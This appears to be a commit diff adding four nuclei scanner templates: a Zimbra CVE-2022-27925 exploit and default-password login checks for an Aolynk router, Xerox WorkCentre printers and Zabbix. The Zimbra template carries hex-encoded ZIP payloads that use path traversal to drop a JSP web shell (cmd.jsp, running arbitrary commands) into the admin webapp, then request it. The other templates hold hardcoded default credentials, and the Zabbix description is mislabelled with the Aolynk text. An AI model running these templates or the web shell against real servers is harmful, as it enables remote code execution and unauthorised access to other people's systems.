add PoCs:CVE-2022-27925、aolynk-br304-default-passwordl、xerox7-default-password、zabbix-default-password 2022-08-18

Author: hktalent

config/nuclei-templates/51pwn/CVE-2022-27925.yaml

@@ -0,0 +1,42 @@
+id: CVE-2022-27925
+info:
+  name: Zimbra RCE simple poc
+  severity: high
+  author:
+  - 51pwn
+  description: |-
+    Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport 
+    functionality that receives a ZIP archive and extracts files from it. 
+    An authenticated user with administrator rights has the ability to upload 
+    arbitrary files to the system, leading to directory traversal.
+
+requests:
+  - raw:
+      - |
+        POST /{{path1}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        {{hex_decode(file1)}}
+      - |
+        GET /zimbraAdmin/cmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        
+    payloads:
+      path1:
+        - service/extension/backup/mboximport?account-name=valid_email&account-status=1&ow=cmd
+        - service/extension/backup/mboximport?account-name=valid_email&ow=2&no-switch=1&append=1
+      file1:
+        - 504b030414000000000006030d5582b02ac73d0300003d030000300000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f636d642e6a73703c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d642e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0a202020202020202050726f636573732070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0a20202020202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0a202020202020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0a2020202020202020537472696e672064697372203d206469732e726561644c696e6528293b0a20202020202020207768696c652028206469737220213d206e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746c6e2864697372293b200a2020202020202020202020202020202064697372203d206469732e726561644c696e6528293b200a202020202020202020202020202020207d0a20202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a0a0a504b030414000000000006030d5582b02ac73d0300003d030000300000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f636d642e6a73703c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d642e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0a202020202020202050726f636573732070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0a20202020202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0a202020202020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0a2020202020202020537472696e672064697372203d206469732e726561644c696e6528293b0a20202020202020207768696c652028206469737220213d206e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746c6e2864697372293b200a2020202020202020202020202020202064697372203d206469732e726561644c696e6528293b200a202020202020202020202020202020207d0a20202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a0a0a504b0102140314000000000006030d5582b02ac73d0300003d030000300000000000000000000000ff81000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f636d642e6a7370504b0102140314000000000006030d5582b02ac73d0300003d030000300000000000000000000000ff818b0300002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f636d642e6a7370504b05060000000002000200bc000000160700000000
+        - 504b030414000000000006030d5582b02ac73d0300003d030000320000002e2e2f2e2e2f2e2e2f2e2e2f6a657474795f626173652f776562617070732f7a696d62726141646d696e2f636d642e6a73703c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d642e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0a202020202020202050726f636573732070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0a20202020202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0a202020202020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0a2020202020202020537472696e672064697372203d206469732e726561644c696e6528293b0a20202020202020207768696c652028206469737220213d206e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746c6e2864697372293b200a2020202020202020202020202020202064697372203d206469732e726561644c696e6528293b200a202020202020202020202020202020207d0a20202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a0a0a504b030414000000000006030d5582b02ac73d0300003d030000320000002e2e2f2e2e2f2e2e2f2e2e2f6a657474795f626173652f776562617070732f7a696d62726141646d696e2f636d642e6a73703c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d642e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0a202020202020202050726f636573732070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0a20202020202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0a202020202020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0a2020202020202020537472696e672064697372203d206469732e726561644c696e6528293b0a20202020202020207768696c652028206469737220213d206e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746c6e2864697372293b200a2020202020202020202020202020202064697372203d206469732e726561644c696e6528293b200a202020202020202020202020202020207d0a20202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a0a0a504b0102140314000000000006030d5582b02ac73d0300003d030000320000000000000000000000ff81000000002e2e2f2e2e2f2e2e2f2e2e2f6a657474795f626173652f776562617070732f7a696d62726141646d696e2f636d642e6a7370504b0102140314000000000006030d5582b02ac73d0300003d030000320000000000000000000000ff818d0300002e2e2f2e2e2f2e2e2f2e2e2f6a657474795f626173652f776562617070732f7a696d62726141646d696e2f636d642e6a7370504b05060000000002000200c00000001a0700000000
+        - 504b030414000000000056000d5553fc516702000000020000002d0000002e2e2f2e2e2f2e2e2f2e2e2f6a657474792f776562617070732f7a696d62726141646d696e2f706f632e6a7370310a504b030414000000000006030d5582b02ac73d0300003d0300002d0000002e2e2f2e2e2f2e2e2f2e2e2f6a657474792f776562617070732f7a696d62726141646d696e2f636d642e6a73703c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d642e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0a202020202020202050726f636573732070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0a20202020202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0a202020202020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0a2020202020202020537472696e672064697372203d206469732e726561644c696e6528293b0a20202020202020207768696c652028206469737220213d206e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746c6e2864697372293b200a2020202020202020202020202020202064697372203d206469732e726561644c696e6528293b200a202020202020202020202020202020207d0a20202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a0a0a504b030414000000000006030d5582b02ac73d0300003d0300002d0000002e2e2f2e2e2f2e2e2f2e2e2f6a657474792f776562617070732f7a696d62726141646d696e2f636d642e6a73703c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d642e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0a202020202020202050726f636573732070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0a20202020202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0a202020202020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0a2020202020202020537472696e672064697372203d206469732e726561644c696e6528293b0a20202020202020207768696c652028206469737220213d206e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746c6e2864697372293b200a2020202020202020202020202020202064697372203d206469732e726561644c696e6528293b200a202020202020202020202020202020207d0a20202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a0a0a504b0102140314000000000056000d5553fc516702000000020000002d0000000000000000000000ff81000000002e2e2f2e2e2f2e2e2f2e2e2f6a657474792f776562617070732f7a696d62726141646d696e2f706f632e6a7370504b0102140314000000000006030d5582b02ac73d0300003d0300002d0000000000000000000000ff814d0000002e2e2f2e2e2f2e2e2f2e2e2f6a657474792f776562617070732f7a696d62726141646d696e2f636d642e6a7370504b0102140314000000000006030d5582b02ac73d0300003d0300002d0000000000000000000000ff81d50300002e2e2f2e2e2f2e2e2f2e2e2f6a657474792f776562617070732f7a696d62726141646d696e2f636d642e6a7370504b05060000000003000300110100005d0700000000
+    attack: clusterbomb
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+        - 'status_code_1 == 401 && status_code_2 == 200'
+        
+    redirects: false
+  

config/nuclei-templates/51pwn/aolynk-br304-default-passwordl.yaml

@@ -0,0 +1,25 @@
+id: aolynk-br304-default-password
+info:
+  name: 华为Aolynk BR304+ 智能安全路由器默认口令
+  author:
+  - 51pwn
+  description: |-
+    fofa: Aolynk BR304
+requests:
+  - raw:
+      - |
+        GET /index_main.html HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46YWRtaW4=
+    matchers:
+      - type: status
+        status:
+        - 200
+      - type: word
+        condition: and
+        part: body
+        words:
+        - '/menu_admin.html'
+    matchers-condition: and
+    redirects: false
+  

config/nuclei-templates/51pwn/xerox7-default-password.yaml

@@ -0,0 +1,25 @@
+id: xerox7-default-password
+info:
+  name: Xerox WorkCentre 7xxx - Default Login
+  severity: high
+  author:
+  - 51pwn
+  description: |-
+    Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer.
+
+requests:
+  - raw:
+      - |
+        POST /userpost/xerox.set HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default
+    matchers:
+      - type: dsl
+        dsl:
+        - 'contains(body,"errmsg") || contains(body,"window.opener.top.location.pathname") && contains(body,"Xerox Corporation") && contains(body,"invalid") && status_code == 200'
+        
+    redirects: false
+  

config/nuclei-templates/51pwn/zabbix-default-password.yaml

@@ -0,0 +1,31 @@
+id: zabbix-default-password
+info:
+  name: Zabbix Default Password
+  severity: high
+  author:
+  - 51pwn
+  description: |-
+    fofa: Aolynk BR304
+
+requests:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        name=Admin&password=zabbix&autologin=1&enter=Sign+in
+    matchers:
+      - type: status
+        status:
+        - 302
+      - type: word
+        condition: and
+        part: header
+        words:
+        - 'Location: zabbix.php?action=dashboard.view'
+        - 'zbx_session'
+    matchers-condition: and
+    redirects: false
+